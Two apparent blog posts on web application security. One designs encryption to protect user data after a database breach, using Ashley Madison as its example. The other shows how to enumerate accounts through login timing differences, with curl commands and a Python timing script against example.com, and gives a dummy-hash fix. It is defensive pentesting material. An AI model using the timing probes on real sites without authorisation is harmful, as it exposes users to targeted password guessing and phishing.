As we go forward, keep in mind that a user will typically have sensitive and non-sensitive information in the database.  Taking Ashley Madison as an example, users will have some information that they want to be public (the type of affair they are looking for, their interests, etc…), and other information they want protected (name, email address, address).  The non-sensitive information will be unencrypted and the sensitive information will be encrypted in our design.

A Simple Example: Protecting the Email Address

Let’s start simple, so simple that we will not even use cryptographic keys in this example.  Suppose the user needs his email address and password to log in.  We already know we are protecting the password in the database with bcrypt, but can we not do the same thing with the email address?  Almost, except the salt brings in some trouble; if we use a fixed salt for the email protection (while keeping a varying salt for the password), then we have already made progress.

Consider how the user would log in: the user enters his email address and password.  The system applies bcrypt to the email address with the fixed salt to look up the user in the database.  From that, the system gets the salt that applies to the password, and computes bcrypt on the user-provided password with that salt to see if it matches the hashed password in the database.  If so, the user is granted access.  Thus the system grants access without ever storing the user’s email address in plaintext form in the database.  Note that if the user does not exist in the database, see my previous blog for how to handle it properly (preventing account enumeration).
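To make the flow concrete, here is a minimal sketch using Python’s bcrypt library.  The fixed salt value, the find_user helper, and the field names are all hypothetical:

    import bcrypt

    # Generated once with bcrypt.gensalt() and kept in configuration; the
    # value below is an illustrative placeholder.
    EMAIL_SALT = b"$2b$12$abcdefghijklmnopqrstuv"

    def email_lookup_key(email):
        # Deterministic: the same email always maps to the same digest, so it
        # can serve as a database lookup key without storing the address.
        return bcrypt.hashpw(email.strip().lower().encode(), EMAIL_SALT)

    def authenticate(db, email, password):
        user = db.find_user(email_lookup_key(email))   # hypothetical helper
        if user is None:
            return None   # handle carefully to prevent account enumeration
        if bcrypt.checkpw(password.encode(), user.password_hash):
            return user
        return None

The forgot-password page can call email_lookup_key the same way, so the address never needs to be stored in the clear.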

What about a user forgetting his password?  No problem: the user enters his email address on the forgot-password page, the system applies bcrypt with the fixed salt to the entered address to see if the user exists in the database, and, assuming yes, emails the user a secret link for password reset.  Within the database, we have to associate that secret link with this user to make sure he only resets his own password (not somebody else’s!).

What if the database is exposed?  Anybody could determine whether a specific user is in the database by computing bcrypt on that user’s email address and looking for a match in the database, but nobody is going to be able to reverse the entire collection of email addresses, which is a big improvement over the present situation.
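Continuing the sketch above, the membership test available to someone holding a dump of the table would look something like this, and costs a full bcrypt computation per guessed address:

    def is_member(table_digests, email):
        # table_digests: the set of email digests from the leaked database.
        return email_lookup_key(email) in table_digests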

This illustrates the concept for a second line of defence for email address protection, but it’s going to be trickier for other data.

Of course, those who can get shells on servers and scrape memory will find that the user information (username and password) is still in memory somewhere until it gets overwritten.  It would be nice if Java had secure storage for sensitive content the way .NET does.

A Second Line of Defence for All the Sensitive Data!

We were able to apply much the same concept to email addresses as is applied to passwords because the email address is used to log in, but this won’t work for other private data that is not presented by the user when he logs in.  So we’re going to have to change our strategy to protect more.  I’ll just give the high level details here — the lower level details can be worked out.

Suppose rather than using bcrypt just to verify the user password, we also use it to derive an encryption key for that user, K_user.  We can imagine, for example, that K_user is derived from bcrypt applied to the combination of username, password, and salt.  After the user is authenticated, K_user is derived, and that key is used to encrypt and decrypt all of the user’s private data.  The data remains decrypted for the session (in a separate database table), but at the end of the session the plaintext data is securely deleted from the database.
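As a sketch of what the key derivation and per-field encryption could look like: here I use bcrypt’s kdf function and the cryptography library’s Fernet, which are my own illustrative choices rather than anything prescribed.

    import base64
    import bcrypt
    from cryptography.fernet import Fernet

    def derive_user_key(username, password, salt):
        # Stretch the username/password/salt combination into a 32-byte key.
        raw = bcrypt.kdf(password=(username + ":" + password).encode(),
                         salt=salt, desired_key_bytes=32, rounds=100)
        return base64.urlsafe_b64encode(raw)   # Fernet expects a base64 key

    def encrypt_field(k_user, plaintext):
        return Fernet(k_user).encrypt(plaintext.encode())

    def decrypt_field(k_user, ciphertext):
        return Fernet(k_user).decrypt(ciphertext).decode()

K_user exists only for the lifetime of the session; at logout, both the key and any decrypted rows are discarded.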

What if one user wants to share information with another user?  For example, Bob on Ashley Madison wants to have an affair with Alice (who might be a bot).  Bob needs some way to share information, such as his email address, with Alice, and that information has to remain encrypted and inaccessible to the server after he logs out.  The solution is to bring in public key cryptography.

Each user needs a public/private key pair.  Each user’s private key is encrypted with K_user; the public key is not encrypted (it is not sensitive).  Now Bob can send his private information to Alice through the system using her public key.  When she logs in, the system can decrypt it and present it to her.  Yet when she is not logged in, the system cannot decrypt it, because it does not have her password available to decrypt her private key.
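A sketch with PyNaCl (one possible library choice; in a real design alice_private would be stored encrypted under her K_user and only unwrapped during her session):

    from nacl.public import PrivateKey, SealedBox

    # At account creation: generate Alice's key pair. The public key is
    # stored in the clear; the private key is stored encrypted under K_user.
    alice_private = PrivateKey.generate()
    alice_public = alice_private.public_key

    # Any time, even while Alice is offline: encrypt Bob's message to her
    # public key. The server cannot read the result.
    ciphertext = SealedBox(alice_public).encrypt(b"my email is bob@example.com")

    # Only during Alice's session, after her private key is unwrapped with
    # K_user, can the message be opened.
    plaintext = SealedBox(alice_private).decrypt(ciphertext)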

Okay, that’s progress, but what if we need administrators to have access to some of that private data when they need it?  That functionality can be built in too, using a public/private administrator key pair.  But the administrator private key should never be on the same system: it needs to be on a separate, network-isolated system, because if the hacker can get access to that key and the database, you’ve lost.  By having a separate, isolated system for administration, you have a much stronger defence in the event of an attack when compared to the current state of the art.  However, understand the security tradeoff being made: having administrative access to all the data is less secure than not having that feature, but it is still stronger than designs like Ashley Madison’s, where there is no second line of defence for a leaked database.
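One way to sketch that administrator capability (hypothetical; the escrow step runs on the web server, while the matching private key lives only on the isolated admin box):

    from nacl.public import PublicKey, SealedBox

    def escrow_user_key(admin_public_key: PublicKey, k_user: bytes) -> bytes:
        # Run at login, while K_user is available: wrap a copy of K_user to
        # the administrators' public key and store the result alongside the
        # user record. Only the offline admin private key can unwrap it.
        return SealedBox(admin_public_key).encrypt(k_user)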

There is one last gotcha that is quite important: what about users forgetting their passwords?  We can still use the forgot-password email secret link for a user to reset his password, but the private data provided by the user is no longer accessible, because K_user is lost.  So we either have to tell users that they lose their information if they forget their password, or users need to involve an administrator in an information recovery process.  There are various complexities in how one might build that, but that’s a story for another time.

Conclusion

Generic security advice is useful and common in the web application security industry, but it only solves part of the problem.  You also need to think about the application you are building and the threats specific to it.  This is where threat modeling comes in.  As we have seen from the Ashley Madison breach, there are a number of systems for which protecting personal information in the event of a security breach would have high value, and this is a more difficult task than protecting passwords in the event of a security breach.  To that end, we introduced a design pattern called the ephemeral knowledge web application, which illustrates how such protection can be achieved.  Ephemeral knowledge web applications are applicable to designs where trusting the server is acceptable, yet the server holds sensitive personal data that needs a second line of defence.

Account Enumeration via Timing Attacks

One of the common issues reported by web application penetration testers is username/account enumeration, typically involving an unauthenticated person trying to identify valid usernames in the system.  Knowing these valid usernames can assist the attacker in crafting further attacks against the system, such as password guessing attacks, phishing attacks, and denial of service attacks via account lockouts.  The following are popular resources for testing for this issue:

All three of these are missing an important approach to testing for enumeration that I have had a lot of success with in the penetration tests that I have done: timing attacks!  Specifically, one can often determine whether a guessed username is valid or not simply by looking at how long the system takes to respond to an authentication/password reset request and comparing that to the amount of time it takes for the system to respond to a request for a valid account.  This implies that if an attacker can guess one valid username, then he can guess many more using this same technique.  Best of all, it can be fully automated by the attacker.

Why Does This Work?

Many systems reveal accounts via trivial inspection, simply by looking at the error message or error code returned by the server, as suggested in the above links.  Additionally, a number of system designers have decided that user friendliness is more important than account enumeration issues, for example, Atlassian.  What remains are mostly systems designed by people who are aware of security requirements and are trying to do what the security people recommend.  One such security recommendation is that a salted hash function is not enough to protect user passwords: instead, you need a slow one-way function such as PBKDF2, bcrypt, or scrypt.

I fully agree with the above recommendation, but along with it we have to recognise that we have opened up an account enumeration vector via timing attacks, unless we have carefully protected against them (remark: the crackstation link above does talk about timing attacks, but the one they describe is completely different and quite impractical compared to the one we discuss here).  This comes about because of the typical implementation: when the system goes to verify the user’s credentials, it does not do the slow function computation for accounts that do not exist, whereas it does for accounts that do exist.  It’s not too hard to think of a fix for this issue.

It is possible that there are similar issues via password reset requests.  How long does a system take to send an email used to reset a user’s password?  Does this leak whether accounts exist?  My initial experiments suggest that yes it does, but for this blog we will focus on authentication only.

How to Test for It?

There are of course many ways to test for it, so I’ll just give you a couple of my favourites.

Let’s start out with some examples using curl, and since the cool people are using JSON, we shall too.  On Linux, the command below measures the time to send a JSON login request for an invalid username (“nosuchuser”) to example.com.

time curl -H "Content-Type: application/json" -X POST -d '{"username":"nosuchuser","password":"wrongpass"}' https://www.example.com/login

If we know there is an “admin” user at the site, we can do a similar test for this user.  What we guess for the password does not matter:

time curl -H "Content-Type: application/json" -X POST -d '{"username":"admin","password":"wrongpass"}' https://www.example.com/login

Tip: If you are using the Burp intercepting proxy, then you can get the curl commands very easily.  Just intercept the login attempt, right-click on the request, and select “Copy as curl command”.  You can then paste it in the terminal window, but you will need to insert “time ” at the beginning.

On a test system, we are looking for a big timing difference between the two requests.  Keep in mind that the time per request will vary from request to request due to numerous factors, but if we see that the slowest time for “nosuchuser” is much faster than the fastest time for the known user (“admin” in this case), then we know the site is vulnerable.  Starting out, you might try, say, five timings each for a known user and an unknown user: if the site is vulnerable, the timings will leave no doubt in your mind.  Once you are sure the site is vulnerable, a single timing for a guessed username will immediately reveal its validity.

I have not tried this on a live system, but depending upon the number of users and servers, I could guess that in some cases (systems with many users and many servers), the signal-to-noise ratio may not be so large, so multiple queries may be needed.

What about Python code?  Below is some code using the requests library that I have used in a few pentests, in a similar manner to the curl examples:

import json
import time

import requests

# Log in to auth_url with the given credentials.
# Raises an exception if the login fails.
def login(auth_url, username, password):
    headers = {'Content-Type': 'application/json'}
    login_values = {'username': username, 'password': password}
    r = requests.post(auth_url, data=json.dumps(login_values), headers=headers)
    if r.status_code == 200:
        return r.cookies
    raise ValueError(json.loads(r.text)['Message'])

auth_url = "https://www.example.com/login"
username = "testuser"
password = "wrongpass"

# Time a single login attempt, in milliseconds.
starttime = time.time() * 1000
try:
    cookie = login(auth_url, username, password)
    print("Login succeeded, got cookie :-)")
except Exception:
    print("Failed to login!")
endtime = time.time() * 1000

print("Time in milliseconds:", endtime - starttime)

Recommendations

As I alluded to above, there is a trivial fix for this: for accounts that do not exist, do a “dummy” password validation check.  This means computing the PBKDF2 / bcrypt / scrypt / whatever on the input data, and doing whatever else you would do for an invalid password, before you reject the login attempt.
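A minimal sketch of the fix with bcrypt (the user lookup and field names are hypothetical):

    import bcrypt

    # Computed once at startup so the dummy check costs the same as a real one.
    DUMMY_HASH = bcrypt.hashpw(b"dummy-password", bcrypt.gensalt())

    def check_credentials(user, password):
        if user is None:
            # Unknown account: burn the same bcrypt time anyway, then reject.
            bcrypt.checkpw(password.encode(), DUMMY_HASH)
            return False
        return bcrypt.checkpw(password.encode(), user.password_hash)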

However, I want to caution the reader because there are more issues here when one uses something like PBKDF2 on the server side, such as denial of service.  That’s why I wrote a research paper about this topic.

Last, I want to say that I think account enumeration becomes less of an issue if we have better protections for authentication than just a single password.  There have been ideas for better balancing security and usability, such as allowing a single password only when a user is coming from an IP address or a device that he has authenticated with before, and requiring two-factor authentication otherwise.  See this and this for examples.